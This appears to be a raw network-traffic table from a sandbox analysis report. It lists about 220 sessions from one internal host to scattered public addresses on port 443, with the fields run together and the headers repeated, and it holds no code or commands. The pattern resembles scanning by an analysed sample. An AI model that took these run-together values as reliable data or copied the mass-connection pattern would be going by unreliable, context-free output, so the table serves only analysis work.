                                          27950192.168.2.2353032126.104.237.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27951192.168.2.2344838176.171.172.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27952192.168.2.2344264105.60.232.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27953192.168.2.2343842141.229.236.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27954192.168.2.2351078179.142.195.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27955192.168.2.2334920169.145.242.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27956192.168.2.235425654.229.197.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27957192.168.2.2339302126.156.174.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27958192.168.2.2359866122.197.243.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27959192.168.2.2348180105.56.154.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27960192.168.2.2354422208.42.235.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27961192.168.2.2350826165.135.104.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27962192.168.2.233467481.22.220.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27963192.168.2.233874495.112.88.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27964192.168.2.2335948219.96.50.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27965192.168.2.235710227.216.35.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27966192.168.2.2346690165.90.141.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27967192.168.2.2356200204.243.249.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27968192.168.2.233564261.199.27.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27969192.168.2.2349666207.177.44.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27970192.168.2.2357842145.210.62.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27971192.168.2.235585499.133.150.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27972192.168.2.2346300104.176.201.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27973192.168.2.2339058131.248.70.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27974192.168.2.235187417.233.149.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27975192.168.2.235862831.103.218.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27976192.168.2.2335548210.236.56.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27977192.168.2.2335922135.193.41.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27978192.168.2.2343726166.243.110.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27979192.168.2.23581909.31.204.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27980192.168.2.2355020219.14.95.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27981192.168.2.2341988153.168.197.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27982192.168.2.234675662.186.202.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27983192.168.2.2334098222.147.192.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27984192.168.2.2346678134.117.135.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27985192.168.2.2336892213.45.237.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27986192.168.2.235401417.36.191.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27987192.168.2.2336240150.15.178.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27988192.168.2.233932041.44.91.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27989192.168.2.2342034100.144.237.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27990192.168.2.2354662138.73.198.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27991192.168.2.2355664152.85.141.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27992192.168.2.2349964104.191.208.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27993192.168.2.2333238194.217.188.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27994192.168.2.2346274101.155.23.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27995192.168.2.2336748173.43.9.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27996192.168.2.2356848191.70.138.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27997192.168.2.2339230128.65.127.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27998192.168.2.2341146120.15.146.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27999192.168.2.2334388154.186.34.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28000192.168.2.23405624.79.93.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28001192.168.2.2333824181.200.249.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28002192.168.2.233302434.76.18.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28003192.168.2.2352030121.7.49.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28004192.168.2.234761462.104.169.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28005192.168.2.2336890119.133.142.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28006192.168.2.2356596119.206.29.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28007192.168.2.2335202106.12.208.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28008192.168.2.235585858.116.76.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28009192.168.2.2359644136.38.165.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28010192.168.2.2356836171.112.173.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28011192.168.2.23604121.49.0.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28012192.168.2.2342000220.175.88.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28013192.168.2.2341170141.88.37.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28014192.168.2.2351198181.226.107.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28015192.168.2.2344382108.166.192.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28016192.168.2.2359544176.161.104.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28017192.168.2.2355510191.238.37.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28018192.168.2.234433478.86.182.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28019192.168.2.234774012.99.130.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28020192.168.2.2340470210.105.103.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28021192.168.2.234324674.50.187.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28022192.168.2.2357234191.218.245.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28023192.168.2.234178494.21.184.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28024192.168.2.2360996100.171.248.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28025192.168.2.2342300208.139.211.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28026192.168.2.234298686.73.44.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28027192.168.2.234751040.1.109.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28028192.168.2.2345594110.218.66.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28029192.168.2.235235041.190.61.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28030192.168.2.235440697.169.74.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28031192.168.2.2358124188.37.56.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28032192.168.2.23595969.230.67.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28033192.168.2.235913840.24.126.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28034192.168.2.234973627.226.55.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28035192.168.2.234784624.7.174.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28036192.168.2.2340960171.136.199.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28037192.168.2.2342824190.5.237.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28038192.168.2.2333754197.53.133.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28039192.168.2.234171289.36.196.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28040192.168.2.234242443.185.158.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28041192.168.2.234029070.203.171.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28042192.168.2.2337380118.85.4.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28043192.168.2.2353812182.42.157.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28044192.168.2.23605101.77.148.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28045192.168.2.2338286204.189.63.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28046192.168.2.2346828102.176.76.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28047192.168.2.235916675.82.113.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28048192.168.2.235843896.6.154.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28049192.168.2.233936670.161.126.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28050192.168.2.2350678115.40.52.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28051192.168.2.233320434.45.162.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28052192.168.2.233643698.31.89.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28053192.168.2.2334744188.224.220.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28054192.168.2.2353098219.4.198.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28055192.168.2.2342056102.53.57.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28056192.168.2.2337252217.32.228.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28057192.168.2.2351778195.210.53.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28058192.168.2.234531060.249.87.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28059192.168.2.234346650.242.104.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28060192.168.2.234624860.36.209.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28061192.168.2.2352456161.95.204.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28062192.168.2.235968247.7.208.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28063192.168.2.236062266.169.171.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28064192.168.2.2345460150.211.228.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28065192.168.2.2350114184.180.65.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28066192.168.2.2338118151.254.69.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28067192.168.2.234723068.217.110.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28068192.168.2.234493485.72.177.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28069192.168.2.2346686184.114.109.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28070192.168.2.2359680175.29.154.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28071192.168.2.233548071.252.238.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28072192.168.2.2357588151.40.230.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28073192.168.2.2344018169.238.166.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28074192.168.2.2343118166.132.64.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28075192.168.2.235998264.97.119.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28076192.168.2.2345748222.63.18.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28077192.168.2.2350748146.46.66.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28078192.168.2.2352846220.124.168.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28079192.168.2.234585077.106.243.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28080192.168.2.2348060217.36.238.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28081192.168.2.2354698106.188.25.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28082192.168.2.235659072.28.197.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28083192.168.2.2339950177.95.96.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28084192.168.2.2349078178.21.50.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28085192.168.2.233322480.143.164.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28086192.168.2.2351084123.203.29.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28087192.168.2.234985496.114.165.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28088192.168.2.2349468195.18.189.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28089192.168.2.2360688150.62.69.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28090192.168.2.2354886220.32.141.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28091192.168.2.2347700196.75.196.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28092192.168.2.2357002125.194.159.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28093192.168.2.2340826178.151.35.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28094192.168.2.235776037.77.227.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28095192.168.2.2340494119.85.162.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28096192.168.2.234496285.146.129.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28097192.168.2.2337688113.166.164.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28098192.168.2.234112080.18.67.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28099192.168.2.234544857.132.35.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28100192.168.2.234834060.217.230.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28101192.168.2.2344616158.87.104.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28102192.168.2.2355966187.254.113.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28103192.168.2.235097094.151.21.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28104192.168.2.235017067.246.135.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28105192.168.2.2355328210.16.80.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28106192.168.2.2349914211.211.242.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28107192.168.2.2333884165.64.234.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28108192.168.2.234063083.241.81.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28109192.168.2.235873841.172.189.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28110192.168.2.235523448.169.112.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28111192.168.2.2339672119.237.221.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28112192.168.2.234530612.247.243.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28113192.168.2.2348954205.241.77.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28114192.168.2.2333832143.33.21.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28115192.168.2.235851465.76.141.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28116192.168.2.233995875.167.168.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28117192.168.2.233790663.54.184.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28118192.168.2.234347419.15.138.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28119192.168.2.2347924153.242.54.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28120192.168.2.2347540146.99.39.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28121192.168.2.234218617.173.86.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28122192.168.2.2348578123.209.175.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28123192.168.2.2351878165.78.46.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28124192.168.2.2358712142.120.41.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28125192.168.2.2346096138.245.39.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28126192.168.2.236051449.8.59.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28127192.168.2.235675467.190.203.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28128192.168.2.2335438138.210.131.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28129192.168.2.2349840213.86.163.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28130192.168.2.2340444147.58.251.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28131192.168.2.234504627.106.58.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28132192.168.2.2354492149.34.191.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28133192.168.2.2338898149.56.110.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28134192.168.2.2343736136.231.160.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28135192.168.2.2360960123.152.173.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28136192.168.2.2342106153.240.94.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28137192.168.2.233488646.174.220.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28138192.168.2.2347732162.29.183.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28139192.168.2.23371989.72.63.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28140192.168.2.2333128173.139.140.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28141192.168.2.2337670162.68.185.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28142192.168.2.235886099.189.147.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28143192.168.2.2341498104.151.43.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28144192.168.2.2337964106.240.125.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28145192.168.2.234346689.240.236.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28146192.168.2.235337639.93.151.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28147192.168.2.233540889.201.163.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28148192.168.2.233286277.242.227.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28149192.168.2.235807699.228.187.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28150192.168.2.2347308106.253.9.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28151192.168.2.233511685.83.44.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28152192.168.2.2360052181.164.103.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28153192.168.2.2352930186.154.66.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28154192.168.2.2354344197.118.52.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28155192.168.2.2342728124.136.17.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28156192.168.2.235496012.203.248.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28157192.168.2.2358148153.28.34.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28158192.168.2.233417075.225.23.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28159192.168.2.235794073.121.96.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28160192.168.2.2335752153.119.18.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28161192.168.2.2358356156.50.57.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28162192.168.2.235556435.125.34.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28163192.168.2.234796646.207.89.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28164192.168.2.235197454.236.81.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28165192.168.2.2341870164.254.178.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28166192.168.2.2357688152.80.72.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28167192.168.2.2334972202.148.43.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28168192.168.2.2337860199.120.138.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28169192.168.2.234274257.148.226.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28170192.168.2.2341010216.19.11.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28171192.168.2.234788013.186.77.175443
                                          TimestampBytes transferredDirectionData


